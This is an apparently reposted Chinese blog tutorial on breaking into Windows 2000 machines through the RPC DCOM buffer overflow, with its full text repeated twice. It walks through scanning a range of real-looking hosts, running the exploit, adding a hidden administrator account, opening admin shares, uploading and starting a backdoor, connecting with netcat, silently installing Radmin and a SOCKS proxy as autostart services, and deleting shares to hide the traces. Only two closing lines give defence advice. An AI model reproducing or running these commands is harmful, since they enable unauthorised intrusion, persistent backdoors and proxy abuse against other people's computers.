dcomrpc入侵
程序员文章站
2022-05-12 23:51:04
需要的工具:
很好的:radmin.exe
扫描工具: retinarpcdcom.exe
溢出攻击工具:RpcDcom(通用溢出工具)
脚本开启telnet工具:telnet.vbe opentelnet.exe resume... 08-10-08...
需要的工具:
很好的:radmin.exe
扫描工具: retinarpcdcom.exe
溢出攻击工具:rpcdcom(通用溢出工具)
脚本开启telnet工具:telnet.vbe opentelnet.exe resumetelnet.exe
代理:sksockserver.exe
后门程序:wineggdropshellpro3thversion 好了,该做的都做的差不多了。现在开始把~~ 首先使用retinarpcdcom.exe扫描一个网段。查找有rpc漏洞的机子,这个漏洞需要135端口开放,(想必 随便扫一下就会发现有许多主机开放的135端口)。。。。。。 (人走运座着都能检到钱) 211.217.50.xx第一个主机就被扫出来又此漏洞。开始工作 看看211.217.50.xx有没有其他的漏洞或是若口令之类的.我们可以使用流光扫描一下, 好了..看样子没有
其他的缺陷,主机开了3389端口,我们可以上去看一下是xp版本还是win2k 哈哈,是win2k server版本
展开命令行: [查看dcomrpc的用法用法 dcomrpc -d <host> [options] ] f:\hack>cd rpc\dcomrpc rpc dcom expl01t coded by .:[oc192.us]:. security complied and modified by expl01t www.longker.com usage: dcomrpc -d <host> [options]
options:
-d:hostname to attack [required]
-t:type [default: 0]
-r:return address [default: selected from target]
-p:attack port [default: 135]
-l:bindshell port [default: 666] types:
0 [0x0018759f]: [win2k-universal]
1 [0x0100139d]: [winxp-universal]
开始进行溢出:
f:\hack>cd rpc\dcomrpc -d211.217.50.xx 0 rpc dcom remote expl01t - .:[oc192.us]:. security
complied and recorrected by expl01t www.longker.com
[ ] resolving host..
[ ] done.
[ ] expl01ting....just wait...... 等到出现,说明溢出成功
c:\winnt\system32> 接着我们建立用户 c:\winnt\system32>net user blueye$content$nbsp;1111 /add
命令成功完成。 把用户添加成超级管理员
c:\winnt\system32>net localgroup administrators blueye$content$nbsp;/add
命令成功完成。
看看共享开了没有,没有的话把共享开开 c:\winnt\system32>net share
清单是空的。 c:\winnt\system32>net share ipc$content$nbsp;
命令成功完成。
c:\winnt\system32>net share admin$content$nbsp;
命令成功完成。 到这里我们入侵告一段落
[ 建 立 ipc$content$nbsp;连 接 ,也可以使用tftp上传 ,先和对方建立连接] f:\hack>net use \\211.217.50.xx\ipc$content$nbsp;"1111" /user:blueye$content$nbsp; [ 上 传 一 个 后 门 程 序 到 对 方 的 主 机 里] f:\hack>copy d:\inject.exe \\211.217.50.xx\admin$\system32 f:\hack>copy d:\tback.dll \\211.217.50.xx\admin$\system32 然后运行后门程序,我们可以使用at命令。但是有的机器把at明令禁止了,建议直接开起telnet
使用opentelnet.exe 关闭开启的telnet使用resumetelnet \\ip user password
如果忘记开共享可以使用脚本开启telnet来开共享,用法:
cscript telnet.vbe ip user password null port (null是验证方式) f:\hack>opentenet \\211.217.50.xx blueye$content$nbsp;1111 1 4567 f:\hack>telnet 211.217.50.xx 4567
省略... 连接并运行后门程序,运行后门程序命令根目录:inject.exe -run
(后门使用方法和安装都在zip文件里面包含了) 后门端口123456
f:\hack>nc 211.217.50.xx 123456
welcome to wineggdropshell matrix version [melody]# 下面安装radmin 配置好的radmin客户端有4个文件。配置radmin客户端可参考相关文章
radmin.reg
raddrv.dll
admdll.dll
r_server.exe 把这个4个文件copy c:\winnt\system32 在目录下面执行命令
c:\winnt\system32>r_server /s radmin.reg -----导入注册表 c:\winnt\system32>r_server /install /silence -----安装radmin.并且不显示托盘 c:\winnt\system32>net start r_server----- 启动服务
可以开启3389的话你自己看着办把,哈哈
安装sock代理
把sksockserver.exe copy c:\winnt\system32 c:\winnt\system32>sksockserver /install-----安装服务 c:\winnt\system32>sksockserver -config port 1234----端口定在1234自己可以改 c:\winnt\system32>sksockserver -config starttype 2----开机自动启动 c:\winnt\system32>net start skserver ----启动服务 最后删除共享
net share ipc$content$nbsp;/del
net share admin$content$nbsp;/del
在安装radmin的时候你发现有人已经安装了。。怎么办?走人?--------no
看操作 (我输入的内容) 后门连接 f:\hack>nc 211.217.50.xx 123456
welcome to wineggdropshell matrix version [melody]#(pslist) [melody]#(pskill r_server) [melody]#(shell) c:\winnt\system32>(del r_server.exe) c:\winnt\system32>(del admdll.dll) c:\winnt\system32>(del raddrv.dll)
copy你自己的上去,然后安装 省事的办法直接导入注册表,然后重新输入安装命令运行,就可以了,只是在原来默认端口上面架上了密 码
等等。。。。为什么我输入导入注册表命令不管用呢?出现什么regedit不是可运行的程序之类的 。 完了,努力白费了。。。。。。。 -----------------------------no 出现这样的情况最简单的解决办法telnet上去导入试试看,什么?不是把,有没有搞错阿。。。 呵呵,尽管放心,去试试看就知道;还可以先运行radmin 然后在radmin的dos下导入,也是可以的 嗬嗬,去试试看吧
防御办法:
安装rpc补丁
使用防火墙过滤135,445,139等端口
很好的:radmin.exe
扫描工具: retinarpcdcom.exe
溢出攻击工具:rpcdcom(通用溢出工具)
脚本开启telnet工具:telnet.vbe opentelnet.exe resumetelnet.exe
代理:sksockserver.exe
后门程序:wineggdropshellpro3thversion 好了,该做的都做的差不多了。现在开始把~~ 首先使用retinarpcdcom.exe扫描一个网段。查找有rpc漏洞的机子,这个漏洞需要135端口开放,(想必 随便扫一下就会发现有许多主机开放的135端口)。。。。。。 (人走运座着都能检到钱) 211.217.50.xx第一个主机就被扫出来又此漏洞。开始工作 看看211.217.50.xx有没有其他的漏洞或是若口令之类的.我们可以使用流光扫描一下, 好了..看样子没有
其他的缺陷,主机开了3389端口,我们可以上去看一下是xp版本还是win2k 哈哈,是win2k server版本
展开命令行: [查看dcomrpc的用法用法 dcomrpc -d <host> [options] ] f:\hack>cd rpc\dcomrpc rpc dcom expl01t coded by .:[oc192.us]:. security complied and modified by expl01t www.longker.com usage: dcomrpc -d <host> [options]
options:
-d:hostname to attack [required]
-t:type [default: 0]
-r:return address [default: selected from target]
-p:attack port [default: 135]
-l:bindshell port [default: 666] types:
0 [0x0018759f]: [win2k-universal]
1 [0x0100139d]: [winxp-universal]
开始进行溢出:
f:\hack>cd rpc\dcomrpc -d211.217.50.xx 0 rpc dcom remote expl01t - .:[oc192.us]:. security
complied and recorrected by expl01t www.longker.com
[ ] resolving host..
[ ] done.
[ ] expl01ting....just wait...... 等到出现,说明溢出成功
c:\winnt\system32> 接着我们建立用户 c:\winnt\system32>net user blueye$content$nbsp;1111 /add
命令成功完成。 把用户添加成超级管理员
c:\winnt\system32>net localgroup administrators blueye$content$nbsp;/add
命令成功完成。
看看共享开了没有,没有的话把共享开开 c:\winnt\system32>net share
清单是空的。 c:\winnt\system32>net share ipc$content$nbsp;
命令成功完成。
c:\winnt\system32>net share admin$content$nbsp;
命令成功完成。 到这里我们入侵告一段落
[ 建 立 ipc$content$nbsp;连 接 ,也可以使用tftp上传 ,先和对方建立连接] f:\hack>net use \\211.217.50.xx\ipc$content$nbsp;"1111" /user:blueye$content$nbsp; [ 上 传 一 个 后 门 程 序 到 对 方 的 主 机 里] f:\hack>copy d:\inject.exe \\211.217.50.xx\admin$\system32 f:\hack>copy d:\tback.dll \\211.217.50.xx\admin$\system32 然后运行后门程序,我们可以使用at命令。但是有的机器把at明令禁止了,建议直接开起telnet
使用opentelnet.exe 关闭开启的telnet使用resumetelnet \\ip user password
如果忘记开共享可以使用脚本开启telnet来开共享,用法:
cscript telnet.vbe ip user password null port (null是验证方式) f:\hack>opentenet \\211.217.50.xx blueye$content$nbsp;1111 1 4567 f:\hack>telnet 211.217.50.xx 4567
省略... 连接并运行后门程序,运行后门程序命令根目录:inject.exe -run
(后门使用方法和安装都在zip文件里面包含了) 后门端口123456
f:\hack>nc 211.217.50.xx 123456
welcome to wineggdropshell matrix version [melody]# 下面安装radmin 配置好的radmin客户端有4个文件。配置radmin客户端可参考相关文章
radmin.reg
raddrv.dll
admdll.dll
r_server.exe 把这个4个文件copy c:\winnt\system32 在目录下面执行命令
c:\winnt\system32>r_server /s radmin.reg -----导入注册表 c:\winnt\system32>r_server /install /silence -----安装radmin.并且不显示托盘 c:\winnt\system32>net start r_server----- 启动服务
可以开启3389的话你自己看着办把,哈哈
安装sock代理
把sksockserver.exe copy c:\winnt\system32 c:\winnt\system32>sksockserver /install-----安装服务 c:\winnt\system32>sksockserver -config port 1234----端口定在1234自己可以改 c:\winnt\system32>sksockserver -config starttype 2----开机自动启动 c:\winnt\system32>net start skserver ----启动服务 最后删除共享
net share ipc$content$nbsp;/del
net share admin$content$nbsp;/del
在安装radmin的时候你发现有人已经安装了。。怎么办?走人?--------no
看操作 (我输入的内容) 后门连接 f:\hack>nc 211.217.50.xx 123456
welcome to wineggdropshell matrix version [melody]#(pslist) [melody]#(pskill r_server) [melody]#(shell) c:\winnt\system32>(del r_server.exe) c:\winnt\system32>(del admdll.dll) c:\winnt\system32>(del raddrv.dll)
copy你自己的上去,然后安装 省事的办法直接导入注册表,然后重新输入安装命令运行,就可以了,只是在原来默认端口上面架上了密 码
等等。。。。为什么我输入导入注册表命令不管用呢?出现什么regedit不是可运行的程序之类的 。 完了,努力白费了。。。。。。。 -----------------------------no 出现这样的情况最简单的解决办法telnet上去导入试试看,什么?不是把,有没有搞错阿。。。 呵呵,尽管放心,去试试看就知道;还可以先运行radmin 然后在radmin的dos下导入,也是可以的 嗬嗬,去试试看吧
防御办法:
安装rpc补丁
使用防火墙过滤135,445,139等端口
上一篇: Adobe Acrobat 存在URL处理命名注入漏洞
下一篇: 等待事件之日志等待事件解决办法